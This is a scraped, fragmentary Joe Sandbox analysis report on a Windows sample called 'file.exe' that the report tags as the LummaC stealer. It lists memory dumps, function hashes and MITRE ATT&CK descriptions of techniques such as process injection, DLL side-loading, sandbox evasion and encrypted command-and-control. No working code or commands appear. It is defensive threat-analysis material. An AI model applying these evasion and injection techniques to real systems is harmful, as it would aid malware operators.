Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54ab3c466251b0123f5156b64611dc049f62e95be1abce08618e2d6dbd6b51f
Instruction ID: ab734cd87153396b14db8023e39725f54e5402e86b57e66912a07dac07349ebc
Opcode Fuzzy Hash: b54ab3c466251b0123f5156b64611dc049f62e95be1abce08618e2d6dbd6b51f
Instruction Fuzzy Hash: EFC09B34A59144CBC254CF86E8D1631B3FC5307208724303B9F0BF7761C560D4059519

Function 00D05FD6 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3423f9d56d3d39b000b44b6d9b40f3de907fad3ecb9f7ca6cb1ed31699b2cd8
Instruction ID: 4c2401dfff76a8c01eb5e45b0e374bf07101f4e273e267f87da188bfbd3f26fb
Opcode Fuzzy Hash: f3423f9d56d3d39b000b44b6d9b40f3de907fad3ecb9f7ca6cb1ed31699b2cd8
Instruction Fuzzy Hash: 3BC09B2476C10057964CCF14DE51575F2F69B87514714F01DC807F3357E534D513851C

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
file.exe

Function 00D050FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
libraryCOMMON

Function 00CCFCA0 Relevance: 6.6, Strings: 5, Instructions: 373
COMMON

Function 00CFF620 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 461
COMMON

Function 00CCD110 Relevance: 1.7, APIs: 1, Instructions: 168
COMMON

Function 00D05BB0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00CD2F94 Relevance: 15.9, APIs: 1, Strings: 9, Instructions: 862
COMMON

Function 00D03220 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Function 00CFF54B Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Function 00CFF5FC Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Function 00CD2F6F Relevance: 1.5, APIs: 1, Instructions: 13
COMMON